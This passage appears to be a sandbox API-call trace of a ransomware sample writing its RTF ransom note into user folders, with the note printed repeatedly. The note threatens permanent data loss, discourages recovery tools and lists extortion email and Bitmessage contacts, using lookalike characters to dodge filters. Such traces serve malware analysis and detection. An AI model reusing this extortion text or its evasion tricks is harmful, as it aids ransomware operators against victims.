y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x236ff98, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fs\x07", lpUsedDefaultChar=0x0) returned 8717 [0295.442] WriteFile (in: hFile=0x228, lpBuffer=0x236ff98*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x236ff98*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0295.443] CloseHandle (hObject=0x228) returned 1 [0295.443] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ga-ie\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ga-ie\\#readme_eman#.rtf")) returned 0xffffffff [0295.443] GetLastError () returned 0x2 [0295.443] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ga-ie\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ga-ie\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0295.444] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0295.444] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 